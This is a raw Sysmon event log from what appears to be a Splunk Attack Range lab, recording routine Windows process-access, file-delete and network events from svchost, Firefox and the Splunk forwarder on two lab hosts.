07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001050065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8403A8FCA015A2DC94B9228E4B00498,SHA256=DBF326C2195EBB237F748C57052122D2D969159FA361B4AE2700E779C8B1B867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126AE4FAEC14A9E810730428633B7796,SHA256=8B59E6D137B2147BF1E76D313ECCDE26000FBDC036CF0054922D7AF06144785F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.604{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8F1AF05E946BCD9711A1CDE1B1ED6C95,SHA256=0F5C8864E17307F3C8CE1D35AC4770D0C1C34F8CDB3FC7404F2114B4E0FD93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B91E9842F81EE5668B68C0B5B561010A,SHA256=19F7DFB5FC8E587C8D48DC8A779B07E1C11CCD772A7B68025146FF0A335B54CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.588{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6CBD94D3D2878BBE7EE0E707A97C3307,SHA256=F3B68CF7458532B88D77ECF652721AE743D4E7C60A8D44D16872158E66E9D903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.573{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=4A2609D475F48638235EF3C1EE4607CE,SHA256=92D645E1E20A16E63907890C21B99C8AEEBFAA920DA9E7663C43E259886FBAA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.573{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1D05EADF8B5987C12351E95499404B05,SHA256=1E4CD89907C8B6E7314B8D0267A44347017F93A61A13548402B10B4F5EA1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:11.233{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57302-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:12.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8F0FEBD80E07F9ED38043AAAED3E653,SHA256=41E9E538584935CEE7157F3993C8EF8F0EFA3B5D8128F87125361448AEB1AD22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=5AE80998F1A6D08F1791EAD23EDC7405,SHA256=0F8E615DE60E94815B231AA748BE551BE5D060509466CB948A93917C0BF87618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=5AD4772D4BE6E9CC7CFA00B64B6CE71A,SHA256=C324FCF91D4B541EB93422BDD5FA434E39A752B6D7A93D78E70472F6D9B1EF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.457{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=33287B256C94A051C011EB4B2777550C,SHA256=FF74549543054CC5BEA457049650367960DA1D6D66566B77E4FFE206F14C1D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 